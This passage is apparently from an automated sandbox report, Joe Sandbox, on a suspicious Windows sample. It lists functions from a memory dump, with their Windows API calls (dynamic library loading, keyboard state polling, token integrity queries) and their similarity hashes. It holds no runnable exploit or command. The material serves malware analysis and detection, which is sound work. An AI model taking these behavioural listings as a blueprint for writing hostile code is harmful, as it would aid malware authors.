                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: 8df480ef13e0e07c79b938d5870b8c242987ac34e01b01b2b4c0dd1fc0215256
                                                    • Instruction ID: e6ce171a7398db83596f0e761433a82bdfcd534c1931555a353b5da1dee99866
                                                    • Opcode Fuzzy Hash: 8df480ef13e0e07c79b938d5870b8c242987ac34e01b01b2b4c0dd1fc0215256
                                                    • Instruction Fuzzy Hash: 5C519F71608204AFD704EF64CC81F6AB7EAFF84304F04491EF856872A1DB31E909CB52
                                                    Function 006CD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 006CD927
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 006CD9AA
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 006CD9C6
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 006CDA07
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 006CDA21
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006B7896,?,?,00000000), ref: 00655A2C
                                                      • Part of subcall function 00655A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006B7896,?,?,00000000,?,?), ref: 00655A50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 327935632-0
                                                    • Opcode ID: fe45a327df7a5813ff96882460153cd474d14e793a8c0a59d81b5b58d470e5dc
                                                    • Instruction ID: 388c3d37ee277c7aab2d62b374fb6b89c6baa7c15cac344b3e8ddec1ae5b526b
                                                    • Opcode Fuzzy Hash: fe45a327df7a5813ff96882460153cd474d14e793a8c0a59d81b5b58d470e5dc
                                                    • Instruction Fuzzy Hash: 2A51F775A00209DFCB40EFA8C494EADB7F6EF09311F148069E856AB322D731ED46CB95
                                                    Function 006BE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006BE61F
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006BE648
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006BE687
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006BE6AC
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006BE6B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: d0768cd8bbfabc1eae20cf66b89d3bf0f44ba9eb7a43c6cf9db3697199694e62
                                                    • Instruction ID: 43774326664c38b1714eb9bcc15b9e7ed65f4f8473fbd582ece888ad341a1d88
                                                    • Opcode Fuzzy Hash: d0768cd8bbfabc1eae20cf66b89d3bf0f44ba9eb7a43c6cf9db3697199694e62
                                                    • Instruction Fuzzy Hash: 68516C35A00205DFCB40EF64C9819AEBBF6EF09310F1484A9E809AB361CB31ED44DF64
                                                    Function 00652344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00652357
                                                    • ScreenToClient.USER32(007157B0,?), ref: 00652374
                                                    • GetAsyncKeyState.USER32(00000001), ref: 00652399
                                                    • GetAsyncKeyState.USER32(00000002), ref: 006523A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: 6ed3ac459774bfca951496a2c5250ec0dd715262cd7ab720915b97ab9a9e763f
                                                    • Instruction ID: 784255db81ae3cceeaa173076371639f4fd03524ccb32a3244ed56b35f40132b
                                                    • Opcode Fuzzy Hash: 6ed3ac459774bfca951496a2c5250ec0dd715262cd7ab720915b97ab9a9e763f
                                                    • Instruction Fuzzy Hash: 0441A235A04106FBCF259F68CC44AEDBB76FB06361F20435AF829922A0CB359D54DFA0
                                                    Function 006A63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A63E7
                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 006A6433
                                                    • TranslateMessage.USER32(?), ref: 006A645C
                                                    • DispatchMessageW.USER32(?), ref: 006A6466
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A6475
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                    • String ID:
                                                    • API String ID: 2108273632-0
                                                    • Opcode ID: 5008ca1517f35342b9d8acf150060cb5987d240f65da1c1ff767e3eec3c24677
                                                    • Instruction ID: 91816fd184a2cfbdf3c2d558be429647698ce6d8ab76cec181abf2b99f9978fe
                                                    • Opcode Fuzzy Hash: 5008ca1517f35342b9d8acf150060cb5987d240f65da1c1ff767e3eec3c24677
                                                    • Instruction Fuzzy Hash: 9831D471900646DFDB64AF74CC45BE67BEAEB06300F18C165F422C22A1E7399C49DF50
                                                    Function 006A8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 006A8A30
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 006A8ADA
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006A8AE2
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 006A8AF0
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006A8AF8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: 7c4966b7f5195afc720d70ef848ae333ff4fb1518e9f51deca35ab0721fd255d
                                                    • Instruction ID: d4f19e9d4dc015f5fb700bd204c447970f74269b6cdb5210fde858f054f7b90f
                                                    • Opcode Fuzzy Hash: 7c4966b7f5195afc720d70ef848ae333ff4fb1518e9f51deca35ab0721fd255d
                                                    • Instruction Fuzzy Hash: F831AD71900219EFDB14DFA8D94CADE7BB6EB05315F10822AFA25A72D1CBB09D14DF90
                                                    Function 006DB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006DB192
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 006DB1B7
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006DB1CF
                                                    • GetSystemMetrics.USER32(00000004), ref: 006DB1F8
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,006C0E90,00000000), ref: 006DB216
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: ff3c2f4f00ec8326cf428c863fbc7f8e928c00effa9b6e0e5a8445bdf522a591
                                                    • Instruction ID: 04ae72fad1171a8a1be760ed72ac2d710941e7b98c11d3b963cb3ec66d6d0e0d
                                                    • Opcode Fuzzy Hash: ff3c2f4f00ec8326cf428c863fbc7f8e928c00effa9b6e0e5a8445bdf522a591
                                                    • Instruction Fuzzy Hash: 5421A031E10251EFCB149F39DC54AAA37A6FB45361F16573AB922C33E4D73099118B80
                                                    Function 006C5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 006C5A6E
                                                    • GetForegroundWindow.USER32 ref: 006C5A85
                                                    • GetDC.USER32(00000000), ref: 006C5AC1
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 006C5ACD
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 006C5B08
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: ac69e5d614e658d550ca69413e910b0d70f76d32420a4e1e33cbe55812543617
                                                    • Instruction ID: ee8de1e031b9ab8f750f70e7072295967f563603192260ba4258493689959309
                                                    • Opcode Fuzzy Hash: ac69e5d614e658d550ca69413e910b0d70f76d32420a4e1e33cbe55812543617
                                                    • Instruction Fuzzy Hash: 54218475A01104AFD714EFA5DC84AAAB7E6EF48311F14C47DF80A97352CA70ED45CB54
                                                    Function 006512F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0065134D
                                                    • SelectObject.GDI32(?,00000000), ref: 0065135C
                                                    • BeginPath.GDI32(?), ref: 00651373
                                                    • SelectObject.GDI32(?,00000000), ref: 0065139C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: 0cadaa6b6e19dba03ec2728003eb696af84c569eccf1ff5d2b504acb1bb5ea91
                                                    • Instruction ID: 5cd1ac7d1eda1dabd21b3c5839f7ae97b79633359663413f3e469859999a5d2d
                                                    • Opcode Fuzzy Hash: 0cadaa6b6e19dba03ec2728003eb696af84c569eccf1ff5d2b504acb1bb5ea91
                                                    • Instruction Fuzzy Hash: B5216D30801608EFDB149F29DC147E97BAAFB41322F14C226F8119A2F0D3759996DF94
                                                    Function 006B4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 006B4ABA
                                                    • __beginthreadex.LIBCMT ref: 006B4AD8
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 006B4AED
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006B4B03
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006B4B0A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                    • String ID:
                                                    • API String ID: 3824534824-0
                                                    • Opcode ID: e025c865a3796bb6e4782642629f3a0b73bcb8f5467a25503ec6319101abdca1
                                                    • Instruction ID: cb4d701dcd29427609b721fed175abba2189870a2261da966a7f3a7977875ab2
                                                    • Opcode Fuzzy Hash: e025c865a3796bb6e4782642629f3a0b73bcb8f5467a25503ec6319101abdca1
                                                    • Instruction Fuzzy Hash: 371108B6D05214BFC7009FAC9C04ADB7FAEEB89320F14826AF915D3391DA75C94087A0
                                                    Function 006A8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006A821E
                                                    • GetLastError.KERNEL32(?,006A7CE2,?,?,?), ref: 006A8228
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,006A7CE2,?,?,?), ref: 006A8237
                                                    • HeapAlloc.KERNEL32(00000000,?,006A7CE2,?,?,?), ref: 006A823E
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006A8255
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: 466ed1d0a9c170e278c21090a5061a2166a74d8bb62105d8e500d96e633a6d7b
                                                    • Instruction ID: bdac2eb1c4b8ae44e5b77e7381cbf1cfbfb45430a0619f78ad66cb26ec637130
                                                    • Opcode Fuzzy Hash: 466ed1d0a9c170e278c21090a5061a2166a74d8bb62105d8e500d96e633a6d7b
                                                    • Instruction Fuzzy Hash: E7011271A01644FFDB105FA5DC48DA77B6EEF8A755750057AF849C3260DA319D00DAA0
                                                    Function 006A710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?,?,006A7455), ref: 006A7127
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?), ref: 006A7142
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?), ref: 006A7150
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?), ref: 006A7160
                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?), ref: 006A716C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: fc8a5561298822696cc3767619610981a0db1d5ce0dcf7fefb19f332233f533e
                                                    • Instruction ID: 7904574d910d015f621583ea9141ee6c2f3b5358ba6fef6e14ec6992df5e49c4
                                                    • Opcode Fuzzy Hash: fc8a5561298822696cc3767619610981a0db1d5ce0dcf7fefb19f332233f533e
                                                    • Instruction Fuzzy Hash: 38018F72A02204BBDB115F64DC44BAA7BFEEF45791F194065FD05D2220D731DD419FA0
                                                    Function 006B5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B5260
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006B526E
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B5276
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006B5280
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B52BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: d58f90c06a8a223bd9b206607cfa5889aeee01fb4486247451e25d24062cfa00
                                                    • Instruction ID: d9e3c8b41d1040b1063ad4a2947e010fd8f4185c3c5f0d8af76558133b2d2f0d
                                                    • Opcode Fuzzy Hash: d58f90c06a8a223bd9b206607cfa5889aeee01fb4486247451e25d24062cfa00
                                                    • Instruction Fuzzy Hash: D2012971D02A1DDBCF00EFE8ED49AEDBB7AFB09711F40155AE942B2244CB709690C7A5
                                                    Function 006A810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006A8121
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006A812B
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A813A
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8141
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8157
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: a7f8800de8e8367ada7c81e9739aab26fc0a1530087013b27fded684606a8d23
                                                    • Instruction ID: 0517b894494d7e90653c1461a6b1f905ae15ce218334fa3824d0a36920054b59
                                                    • Opcode Fuzzy Hash: a7f8800de8e8367ada7c81e9739aab26fc0a1530087013b27fded684606a8d23
                                                    • Instruction Fuzzy Hash: 05F06271701305AFEB111FA5EC88EA73BAEFF4A754B040036F986C7250DB619D41DEA0
                                                    Function 006AC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 006AC1F7
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 006AC20E
                                                    • MessageBeep.USER32(00000000), ref: 006AC226
                                                    • KillTimer.USER32(?,0000040A), ref: 006AC242
                                                    • EndDialog.USER32(?,00000001), ref: 006AC25C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 8a693412f20ca39a917d454c26586f132c1415842c8df3dce723ca4f52d67460
